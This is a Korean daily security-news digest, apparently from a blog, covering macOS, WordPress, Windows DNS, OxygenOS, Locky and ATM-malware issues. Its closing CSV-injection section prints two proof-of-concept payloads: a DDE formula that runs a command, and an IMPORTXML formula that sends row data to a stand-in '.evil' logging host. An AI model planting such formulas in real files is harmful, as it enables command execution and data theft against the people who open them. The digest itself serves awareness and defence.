일일 보안이슈
애플 비밀번호 힌트버튼이 실제 비밀번호 출력하는 취약점 수정
데스크톱 및 노트북에서 macOS High Sierra 를 사용중이라면 빨리 패치하는게 좋을것. 지난 6일 에플은 macOS High Sierra 10.13 업데이트를 출시, OS 정규 릴리즈 이후 불과 일주일 만에 있었던 일. 애플에 따르면 자체제공하는 디스크 관리 도구를 통해 암호화된 APFS(APple File System)볼륨에 인증되지 않은 사용자가 접근할 수 있던 취약점이 있었던 걸로. 브라질 출신 개발자 Matheus Mariano가 발견. 아래는 시연영상 기사원문
워드프레스 플러그인 0-day 취약점
워드프레스 보안팀 Wordfence 에 따르면 Appointments, Registration Magic-Custom Registration Forms, Flickr Gallery 플러그인에서 9.8/10 점의 0-day 취약점이 발견. 이로인해 원격의 공격자가 PHP 백도어를 인증없이 설치 가능. 영향받는 플러그인과 패치버전은 아래와 같다. 기사원문
1. Appointments by WPMU Dev (fixed in 2.2.2)
2. Flickr Gallery by Dan Coulter (fixed in 1.5.3)
3. RegistrationMagic-Custom Registration Forms by CMSHelpLive (fixed in 3.7.9.3)
Locky 랜섬웨어 확장자 변경(.Asasin) 스팸캠페인으로 유포
최근 사용하던 확장자는 ykcol, Asasin 랜섬웨어라고 부르기도 하지만 정확하겐 Locky 의 변종. Document invoice_95649_sign_and_return.pdf is complete 등의 메일제목을 활용해 유포된다. 기사원문
WinOS, DNS 버그로 코드실행 가능 취약점
MS는 Win8, Win10, Server2012, Server2016 이 설치된 DNS 클라이언트에 영향을 끼치는 취약점을 패치. CVE-2017-11779로 할당된 이 취약점은 WinOS 에서 DNS request/response 를 관리하는 코어 모듈 DNSAPI.dll 에 존재하는 Heap BOF 취약점. DNSAPI.dll 이 DNSSEC 프로토콜을 처리하는 과정에서 발생하는 취약점이기에 이 프로토콜을 지원하지 않는 Win7 이하는 영향받지 않음. DNSSEC 은 UDP 기반의 기존 DNS 프로토콜을 더 secure 하게 쓸 수 있는 프로토콜.
BishopFox 보안연구원 Nick Freeman 이 발견. 악의적으로 수정된(malformed) DNS response 를 공격대상 PC에 보내 SYSTEM 권한으로 코드실행 가능. 따라서 익스플로잇 하려면 공격자가 DNS 서버를 구성할 필요가 있고, 공격대상 PC 및 네트워크의 DNS 트래픽을 하이재킹 할 필요가 있음. 하지만 현대의 거의 모든 앱은 DNS request 를 발생하기에, 일단 접근만 가능하다면 SYSTEM 권한의 코드실행은 어려운 일이 아님. 다행인 점은 이 malformed DNS response 가 정상 DNS 서버를 통과하진 못한다는 점. 비정상 response 라 판단해 일반 DNS 서버에선 이 패킷을 드랍. 아래는 취약점 설명 동영상. 기사원문
OxygenOS 개인정보 익명화되지 않은채 수집
OxygenOS 는 모든 OnePlus 스마트폰에 설치된 안드로이드 OS 의 커스텀 버전. 이 OS가 데이터 익명화 없이 OnePlus 사용자에 접근할 수 있게 해. 사용자가 직접 이 기능을 비활성화 하기도 까다로운 편. 중국 선전 시(Shenzhen) 소재의 스마트폰 제조사인 이곳에서 수집하는 개인정보는 다음과 같다. 기사원문
* Device’s phone number
* IMEI code
* IMSI code
* ESSID and BSSID wireless network identifiers
* Phone serial number
* MAC addresses
* Mobile network names
* Battery status
* When the user launched or closed an app
* Which app the user opened
* Timestamp when the user locked or unlocked his phone
* Timestamp when the device screen went on or off
* and more…
신종 ATM 대상 악성코드 ATMii
Win7 과 Win Vista 가 설치된 ATM 을 대상으로 한 악성코드를 발견. 일반 사용자 접근이 극도로 제한된 ATM 설치 OS 특성상 대부분 WinXP 를 쓴다는점을 생각해보면 Win7 및 Vista 대상 악성코드란 점은 특이. 따라서 매우 특정한 공격 대상을 목표로함을 유추할 수 있어. 지난 4월 카스퍼스키에 의해 첫 발견. USB나 네트워크를 통해 ATM에 접근만 가능하다면 ATM의 모든 현금을 가져갈 수 있다. ATMii 분석 기술문서 와 기사원문
구글 스프레드 시트 CSV 인젝션
구글 스프레드 시트에서 수식은 무조건 실행시킨다는 점을 이용, CSV 파일에 구글 스프레드 시트의 명령 IMPORTXML() 을 활용해 멀웨어 다운로드 등의 행위 가능. CSV 파일은 데이터를 ‘쉼표’로 구분하는 표준 스프레드시트(엑셀) 파일포맷. 블로그원문
human readable 포맷인 CSV 기에 아래 POC 를 .csv 로 저장하고 구글 스프레드 시트로 열어본다면 POC 를 확인할 수 있다.
예제1
UserId,BillToDate,ProjectName,Description,DurationMinutes
1,2017-07-25,Test Project,Flipped the jibbet,60
2,2017-07-25,Important Client,"Bop, dop, and giglip", 240
2,2017-07-25,Important Client,"=2+5+cmd|' /C calc'!A0", 240
예제2
UserId,BillToDate,ProjectName,Description,DurationMinutes
1,2017-07-25,Test Project,Flipped the jibbet,60
2,2017-07-25,Important Client,"Bop, dop, and giglip", 240
2,2017-07-25,Important Client,"=IMPORTXML(CONCAT(""http://some-server-with-log.evil?v="", CONCATENATE(A2:E2)), ""//a"")",240
